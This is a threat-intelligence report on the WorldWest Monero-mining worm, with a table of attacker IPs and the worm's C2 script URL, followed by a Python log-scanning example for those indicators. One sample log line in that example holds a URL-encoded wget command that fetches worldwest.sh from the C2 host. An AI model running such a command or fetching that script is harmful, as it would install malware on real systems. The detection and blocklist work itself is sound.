Security Intelligence

The Wapack Labs SOC observed a new cryptominer worm attacking oil and gas industry targets in an automated, opportunistic campaign. Two separate series of exploitation attempts occurred on 02 and 05 October 2018.

Figure 1. 185.232.64.161 trying to run 185.10.68.163/worldwest.sh 

An unidentified actor was attempting to exploit Internet-facing servers and the home routers of oil and gas VIPs from two Romania-based IP addresses. The activity was opportunistic: the actor(s) attempted to exploit any device running Java XML or Jenkins, as well as Dell SonicWall appliances, MVPower DVRs, D-Link DSL2750B routers and Netgear DGN1000 Series routers. Inspection of the packets revealed that all of the exploits referred to a common IP address, which appeared to be the command and control source, and to a shell script named "worldwest.sh".

Open-source research on the shell script turned up a research paper published by Juniper Networks on 27 September 2018 describing a new cryptomining worm that uses this script. The worm first compromises the victim using any of the exploits above, then runs the WorldWest shell script. That script in turn downloads and installs two further shell scripts: a Monero cryptocurrency miner and a network scanner. While the victim mines Monero, it also scans the network for other targets and attempts to infect other devices using both brute-force SSH attempts and the exploit kit. An indicator CSV file is available to prepare a blacklist.

Indicators

| Indicator | Type | Kill_Chain_Phase | First_Seen | Last_Seen | Comments | Attribution |
|---|---|---|---|---|---|---|
| 185.232.64.32 | IP | Exploitation | 10/05/2018 | 10/05/2018 | Recommend block | WorldWest |
| 185.232.64.161 | IP | Exploitation | 10/02/2018 | 10/02/2018 | Recommend block | WorldWest |
| 185.10.68.163 | IP | C2 | 9/19/2018 | 10/05/2018 | Recommend block | WorldWest |
| http://185.10.68.163/worldwest.sh | URL | Exploitation | 9/19/2018 | 10/05/2018 | Recommend block | WorldWest |
| worldwest.sh | File | Exploitation | 9/19/2018 | 10/05/2018 | Recommend block | WorldWest |
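The report notes that the exploit requests all pointed at the same download URL and that the indicator CSV is meant to feed a blocklist. The following added example (not code from Wapack Labs or the report) shows one way to put the table above to use: it loads the indicators by type and sweeps web-server access logs for the source IPs, the C2 URL or IP, and the script name, decoding URL-encoded request lines first. The log lines and the combined-log regex are assumptions constructed for the example.

```python
import csv
import io
import re
from urllib.parse import unquote
# Indicator CSV rebuilt from the table in this report (values are the report's own).
INDICATOR_CSV = """Indicator,Type,Kill_Chain_Phase
185.232.64.32,IP,Exploitation
185.232.64.161,IP,Exploitation
185.10.68.163,IP,C2
http://185.10.68.163/worldwest.sh,URL,Exploitation
worldwest.sh,File,Exploitation
"""
# Combined-format web log (assumed layout): client IP, identd, user, [timestamp], "request".
LOG_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<req>[^"]*)"')

def load_indicators(text):
    """Group indicator values by Type (IP/URL/File) so each log field is checked against the right set."""
    by_type = {}
    for row in csv.DictReader(io.StringIO(text)):
        by_type.setdefault(row["Type"], set()).add(row["Indicator"].strip())
    return by_type

def match_line(line, ind):
    """Return the set of reasons one access-log line matches the WorldWest indicators."""
    m = LOG_RE.match(line)
    if not m:
        return set()
    src = m.group("src")
    req = unquote(m.group("req"))  # payloads often carry the download command URL-encoded
    reasons = set()
    if src in ind.get("IP", ()):
        reasons.add("source-ip")
    if any(u in req for u in ind.get("URL", ())):
        reasons.add("c2-url")
    if any(ip in req for ip in ind.get("IP", ())):
        reasons.add("c2-ip")
    if any(f in req for f in ind.get("File", ())):
        reasons.add("script-name")
    return reasons

def scan(lines, ind):
    """Map the index of each matching line to its reasons; clean lines are omitted."""
    hits = {i: match_line(l, ind) for i, l in enumerate(lines)}
    return {i: r for i, r in hits.items() if r}

# Constructed sample lines (not from the report): one hit followed by two clean requests.
SAMPLE_LOG = [
    '185.232.64.161 - - [02/Oct/2018:11:04:19 +0000] "GET /cgi-bin/example?cmd=wget%20http://185.10.68.163/worldwest.sh HTTP/1.1" 404 0',
    '10.0.0.5 - - [02/Oct/2018:11:05:01 +0000] "GET /index.html HTTP/1.1" 200 512',
    '203.0.113.9 - - [05/Oct/2018:08:12:44 +0000] "POST /jenkins/script HTTP/1.1" 403 0',
]
```

Running `scan(SAMPLE_LOG, load_indicators(INDICATOR_CSV))` flags only the first line, with all four reasons; a hit on the C2 URL or script name from an internal source address is the case worth escalating, since it indicates a device that has already been reached by the exploit stage.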
